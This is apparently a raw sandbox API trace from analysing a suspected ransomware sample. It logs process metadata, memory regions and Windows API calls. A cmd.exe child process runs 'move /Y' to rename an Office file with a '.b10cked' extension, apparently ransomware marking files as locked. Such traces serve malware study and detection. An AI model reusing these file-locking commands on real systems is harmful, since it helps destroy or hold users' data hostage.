dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x20f200, nSize=0x0, Arguments=0x20f1fc | out: lpBuffer="\xe8\x0c\x41") returned 0x61 [0178.045] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x410ce8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0178.045] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.045] _write (in: _FileHandle=1, _Buf=0x410ce8*, _MaxCharCount=0x61 | out: _Buf=0x410ce8*) returned 97 [0178.045] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.045] LocalFree (hMem=0x410ce8) returned 0x0 [0178.045] IcmpCloseHandle (IcmpHandle=0x408b40) returned 1 [0178.163] LocalFree (hMem=0x404830) returned 0x0 [0178.163] LocalFree (hMem=0x40ebb0) returned 0x0 [0178.163] WSACleanup () returned 0 [0178.346] exit (_Code=0) Thread: id = 418 os_tid = 0xa38 Thread: id = 419 os_tid = 0xb24 Thread: id = 420 os_tid = 0xbe0 Process: id = "315" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24375 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24376 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24377 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24378 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 24379 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24380 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24381 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24382 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24383 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24384 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24433 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24434 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24435 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24436 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 24437 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 24438 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24439 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24440 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24441 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24442 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24443 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24444 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24445 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24446 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24447 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 24448 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24449 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24450 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24451 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24452 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 24453 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24454 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 24455 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24456 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 422 os_tid = 0xb0c [0176.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f93c | out: lpSystemTimeAsFileTime=0x18f93c*(dwLowDateTime=0x9f3636c0, dwHighDateTime=0x1d440a9)) [0176.870] GetCurrentProcessId () returned 0xa88 [0176.870] GetCurrentThreadId () returned 0xb0c [0176.870] GetTickCount () returned 0x334a6 [0176.870] QueryPerformanceCounter (in: lpPerformanceCount=0x18f934 | out: lpPerformanceCount=0x18f934*=23365899605) returned 1 [0176.870] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.871] __set_app_type (_Type=0x1) [0176.871] __p__fmode () returned 0x76b331f4 [0176.871] __p__commode () returned 0x76b331fc [0176.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.871] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.871] GetCurrentThreadId () returned 0xb0c [0176.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0c) returned 0x38 [0176.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.871] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.871] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8cc | out: phkResult=0x18f8cc*=0x0) returned 0x2 [0176.872] VirtualQuery (in: lpAddress=0x18f903, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.872] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f89c, dwLength=0x1c | out: lpBuffer=0x18f89c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0176.872] GetConsoleOutputCP () returned 0x1b5 [0176.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.872] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.873] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.873] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.873] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.873] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.873] GetEnvironmentStringsW () returned 0x310218* [0176.873] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.873] GetEnvironmentStringsW () returned 0x310218* [0176.873] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.873] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e83c | out: phkResult=0x18e83c*=0x40) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0xa8, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x0, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegCloseKey (hKey=0x40) returned 0x0 [0176.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e83c | out: phkResult=0x18e83c*=0x40) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x40, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x1, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x0, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x4, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x4) returned 0x0 [0176.874] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e844, lpData=0x18e848, lpcbData=0x18e840*=0x1000 | out: lpType=0x18e844*=0x0, lpData=0x18e848*=0x9, lpcbData=0x18e840*=0x1000) returned 0x2 [0176.874] RegCloseKey (hKey=0x40) returned 0x0 [0176.874] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.874] srand (_Seed=0x5b88638c) [0176.874] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" [0176.874] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"" [0176.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.875] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.875] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.875] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.875] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.875] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.875] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.875] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.875] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.875] GetEnvironmentStringsW () returned 0x312368* [0176.875] FreeEnvironmentStringsW (penv=0x312368) returned 1 [0176.875] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.875] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.875] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.875] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.875] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.875] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0176.875] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.875] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.876] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.876] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.876] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f608 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.876] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f608, lpFilePart=0x18f604 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f604*="Desktop") returned 0x18 [0176.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f384 | out: lpFindFileData=0x18f384) returned 0x3109f8 [0176.876] FindClose (in: hFindFile=0x3109f8 | out: hFindFile=0x3109f8) returned 1 [0176.876] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.876] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.876] GetEnvironmentStringsW () returned 0x310218* [0176.877] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.877] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.877] GetConsoleOutputCP () returned 0x1b5 [0176.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.877] GetUserDefaultLCID () returned 0x409 [0176.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f748, cchData=128 | out: lpLCData="0") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f748, cchData=128 | out: lpLCData="0") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f748, cchData=128 | out: lpLCData="1") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0176.878] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.879] GetConsoleTitleW (in: lpConsoleTitle=0x300938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.880] _wcsicmp (_String1="move", _String2=")") returned 68 [0176.880] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0176.880] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0176.880] _wcsicmp (_String1="IF", _String2="move") returned -4 [0176.880] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0176.880] _wcsicmp (_String1="REM", _String2="move") returned 5 [0176.880] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0176.883] GetConsoleTitleW (in: lpConsoleTitle=0x18f440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.883] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0176.883] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0176.883] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CD") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="REN") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="SET") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="MD") returned 11 [0176.884] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0176.884] _wcsicmp (_String1="move", _String2="RD") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0176.884] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="VER") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="START") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0176.884] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0176.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.885] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", 